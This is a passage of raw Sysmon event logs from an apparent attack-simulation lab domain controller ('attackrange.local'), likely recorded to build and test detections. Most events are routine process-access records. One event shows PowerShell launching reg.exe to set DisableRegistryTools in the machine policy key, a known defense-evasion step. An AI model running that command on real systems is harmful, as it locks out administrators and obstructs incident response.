mages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537ce58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537ce58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537cd75(wow64) 154100x800000000000000010852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:22.898{266CAFBE-6672-6064-7201-00000000AE01}724C:\Windows\SysWOW64\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exe"C:\Windows\system32\reg.exe" add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t REG_DWORD /d 1 /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=ECB768001DC8424E9B1FF3AC1E89C937,SHA256=CBB9F8D012CB0AF2CA87AC74ABB5C77A7743C64697C8D92104D3EBA27A699AB0,IMPHASH=7EF58A970E6E6D04FE3D5D7732CF5BAA{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000010851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:22.348{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FF04A31BA46CE0A439A39CD04EAAEF6,SHA256=20E9A76A4851DE612F4B7EB79B70ADC09234CF929665C6F51EEC764D6076057F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:23.863{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A65EFD1A7B6B0CDF929B8688224413C9,SHA256=DDA179FCDA713E418C43ECF9EADB07CA546C170A8C61E6A4F195BBCE6EC0DEB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:23.394{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFD33E32BE99427C6D29C19E9B41CA4B,SHA256=7E12BB6ECF9E7E2A6715BA41A98B01B642817E2089D098531C17890ECC512FE1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:24.504{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:24.504{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:24.504{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:24.504{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:24.504{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:24.504{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:24.504{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:24.457{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45F7BC4551B5CB03199D17FE66ACE879,SHA256=6FAFBF8372CF92F168CC02466A240671C9EEAE91D08C003F9CBE2FD3BBC8A4CE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:24.254{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:24.254{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:24.254{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:24.254{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x800000000000000010884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:25.472{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=776244788749ABD8873F89E7C647AF99,SHA256=0697132AF0F27C167AEC494C0EE38DEFE2AE38BEB0C6FB196F5CA9E3E9C8CAF8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:25.191{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:25.191{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:25.191{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:25.191{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:25.191{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:25.191{266CAFBE-64C4-6064-9C00-00000000AE01}46204256C:\Windows\system32\sihost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:25.019{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:25.019{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\